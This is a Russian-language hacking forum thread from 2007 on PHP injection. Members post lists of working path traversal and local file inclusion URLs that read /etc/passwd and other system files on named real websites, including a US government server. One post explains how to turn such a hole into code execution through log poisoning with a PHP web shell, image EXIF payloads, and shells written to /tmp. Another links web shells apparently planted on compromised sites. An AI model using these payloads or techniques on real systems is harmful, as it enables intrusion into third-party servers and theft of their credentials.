PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.sodepau.org/cat/index.php?id=../../../../../etc/passwd
    http://www.sodepau.org/cat/index.php?id=../../../../../etc/hosts
    http://www.sodepau.org/cat/index.php?id=../../../../../etc/services
    http://www.sodepau.org/cat/index.php?id=../../../../../etc/group
    http://www.sodepau.org/cat/index.php?id=../../../../../etc/profile
     
    1 person likes this.
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    будьте внимательны, и получите шелл ;-) а там
    Free space : 1550.16 GB Total space: 1805.85 GB

     
  3. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    Локальный инклудинг

    Code:
    http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/passwd
    http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/ftpusers
    http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/hosts
    http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/group
    http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/services
    http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/profile
    
    я ничего не смог там сделать(
     
  4. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    тож локалка
    Code:
    http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
    Обьясните мне плз в чем смысл находить etc/passwd?
     
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    WindowS =)

    Ru

    ps: обычно смысл в том,что в passwd пути к папкам юзеров. также можн опопробовать связки логин пароль на фтп,БД и т.д. )
     
    #525 $n@ke, 3 Nov 2007
    Last edited: 3 Nov 2007
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Смысл в том, что /etc/passwd есть на любой nix-ОС и если получилось его заинклюдить (как вариант прочитать), то значит как минимум локальный инклюд есть (я не беру вариант с опенбэйздир) и не надо подбирать путьк нему, т.к. при любом (большом) количестве /../ ты всеравно его прочитаешь (потому что выше рута / не прыгнешь), а дальше все, что подскажет тебе воображение...
    например есть локальный инклюд, ты можешь:

    1) прочитать и использовать passwd файл для брута по маске login:login (к тому же узнать путь к домашним директориям пользователей, иногда очень нужно)

    2) узнав методом перебора стандартных путей путь к логам апача, ты можешь намеренно вызвать ошибку, записать к примеру в error_log php код а потом этот error_log проинклюдить (заметь локально) и соответственно этот код выполнить (например элементарный веб-шелл <?php system($_GET[cmd]); ?>)

    3) если на сайте есть возможность заливки картинок, то ты можешь вставить php код в gif или в Exif данные jpeg картинки, а потом с помошью все того же локального инклюда выполнить этот код (проинклюдив картинку)

    4) Есть у тебя к примеру SQL инъекция и у пользователя БД есть права filepriv, но ты не можешь записать шелл т.к. незнаешь путей, или нет ни одной паки доступной из веба с правами на запись, в первом случае ты можешь прочитать файл httpd.conf (если найдешь, и если будут права на чтение) и узнать пути, хотя это можно сделать и через sql-inj, при втором варианте ты пишешь свой шелл в /tmp и с помощью локального инклюда подцепляешь свой шелл из /tmp

    5) куча вариантов, насколько фантазии хватит


    Если есть просто читалка файлов, то ты можешь посмотреть файлы конфигурации на сайте и узнать пароль и пользователя БД (обычно они в незашифрованном виде)

    ну надеюсь ты понял...
     
    #526 Scipio, 3 Nov 2007
    Last edited: 3 Nov 2007
  7. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    да, огромное спс!
     
  8. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Windows NT DS-31077-1 5.2 build 3790

    http://nyec.modernsignal.net/content/documents/document2.php

    -----

    http://www.ncti-india.com/ncti-archive/txtfiles/roki.php
    http://sayko-esrarci.com/r57.php
    http://milfmuncher.net/dump.php
    http://www.karizmatikshow.com/zzz.php
    http://pp.dhbl.org/phpshell/r57.php
    http://myauction.us/banners/r57shel.jpg.pdf.swf.php
    http://www.wshakespeare.net/images/r57shell.htm
     
    #528 ~!DoK_tOR!~, 5 Nov 2007
    Last edited: 5 Nov 2007
    2 people like this.
  9. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    Free space : 1665.75 GB Total space: 3209.17 GB

    этот shell.php сразу в глаза бросилса...ну и названьице))
     
  10. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/passwd
    http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/hosts
    http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/group
    http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/services
    http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/profile
    http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/syslog.conf
    Code:
    http://www.iswizards.com/index.php?PAGE=../../../../etc/passwd
    http://www.iswizards.com/index.php?PAGE=../../../../etc/hosts
    http://www.iswizards.com/index.php?PAGE=../../../../etc/group
    http://www.iswizards.com/index.php?PAGE=../../../../etc/services
    http://www.iswizards.com/index.php?PAGE=../../../../etc/profile
    http://www.iswizards.com/index.php?PAGE=../../../../etc/syslog.conf
    Code:
    http://www.whototake.com/index.php?page=../../../../../etc/passwd
    http://www.whototake.com/index.php?page=../../../../../etc/hosts
    http://www.whototake.com/index.php?page=../../../../../etc/group
    http://www.whototake.com/index.php?page=../../../../../etc/services
    http://www.whototake.com/index.php?page=../../../../../etc/profile
    http://www.whototake.com/index.php?page=../../../../../etc/syslog.conf
    Code:
    http://deine-lernlinks.de/index.php?page=../../../../../etc/passwd
    http://deine-lernlinks.de/index.php?page=../../../../../etc/hosts
    http://deine-lernlinks.de/index.php?page=../../../../../etc/group
    http://deine-lernlinks.de/index.php?page=../../../../../etc/services
    Code:
    http://www.aiongenesis.com/index.php?page=../../../../../etc/passwd
    http://www.aiongenesis.com/index.php?page=../../../../../etc/hosts
    http://www.aiongenesis.com/index.php?page=../../../../../etc/group
    http://www.aiongenesis.com/index.php?page=../../../../../etc/services
    http://www.aiongenesis.com/index.php?page=../../../../../etc/profile
    http://www.aiongenesis.com/index.php?page=../../../../../etc/syslog.conf
    Code:
    http://www.sodepau.org/cat/index.php?id=../../../../../../etc/passwd
    http://www.sodepau.org/cat/index.php?id=../../../../../../etc/hosts
    http://www.sodepau.org/cat/index.php?id=../../../../../../etc/group
    http://www.sodepau.org/cat/index.php?id=../../../../../../etc/services
    http://www.sodepau.org/cat/index.php?id=../../../../../../etc/profile
    http://www.sodepau.org/cat/index.php?id=../../../../../../etc/syslog.conf
    Code:
    http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/passwd
    http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/hosts
    http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/group
    http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/services
    http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/profile
    Code:
    http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/passwd
    http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/hosts
    http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/group
    http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/services
    http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/profile
    Code:
    http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/passwd
    http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/hosts
    http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/group
    http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/services
    http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/profile
    http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/syslog.conf
    Code:
    http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/passwd
    http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/hosts
    http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/group
    http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/services
    http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/profile
    Code:
    http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/passwd
    http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/hosts
    http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/group
    http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/services
    http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/profile
    http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/syslog.conf
     
    #530 t0ox, 5 Nov 2007
    Last edited: 5 Nov 2007
    2 people like this.
  11. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    _-_
     
  12. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    _-_

     
    #532 $n@ke, 7 Nov 2007
    Last edited: 7 Nov 2007
  13. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Могет и боян, но это антибоян пока найдёшь весь трафик уплывёт :(
     
    #533 NOmeR1, 8 Nov 2007
    Last edited: 8 Nov 2007
    1 person likes this.
  14. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
     
    3 people like this.
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    куча поддоменов web.psi.ch.....

     
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    php-ru.info


    Code:
    http://php-ru.info/index.php?dn=html&path=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=

    Гыгыы, а пишут еще "Проверенные скрипты и сервисы"


    UPD:

    Я сейчас посмотрел и понял, что такая бага присутствует в моде "парсер html" (dn=html) к cms Danneo CMS, но думаю в уязвимости CMS постить не буду, кто хочет - запостите
     
    3 people like this.
  17. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Может и боян, нет возможности проерить. =)
    Решил надыбать еду =)
     
    #537 NOmeR1, 9 Nov 2007
    Last edited: 9 Nov 2007
    2 people like this.
  18. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    ru Win
     
  19. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://history.mashaholl.com/history.php?page=../../../../../../../../etc/passwd
     
    2 people like this.
  20. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    http://ar.water.usgs.gov
    Code:
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/passwd
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/hosts
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/ftpusers
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/services
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/group
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/networks
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/profile
    http://ar.water.usgs.gov/sun/sparta_recovery/header.phtml?where=../../../etc/syslog.conf
    
    http://banshee.ru
    Code:
    http://banshee.ru/main.php?page=../../../../etc/passwd%00
    http://banshee.ru/main.php?page=../../../../etc/hosts%00
    http://banshee.ru/main.php?page=../../../../etc/services%00
    http://banshee.ru/main.php?page=../../../../etc/group%00
    http://banshee.ru/main.php?page=../../../../etc/profile%00
    http://banshee.ru/main.php?page=../../../../etc/syslog.conf%00
    
     
    #540 0nep@t0p, 10 Nov 2007
    Last edited: 10 Nov 2007
    2 people like this.
Loading...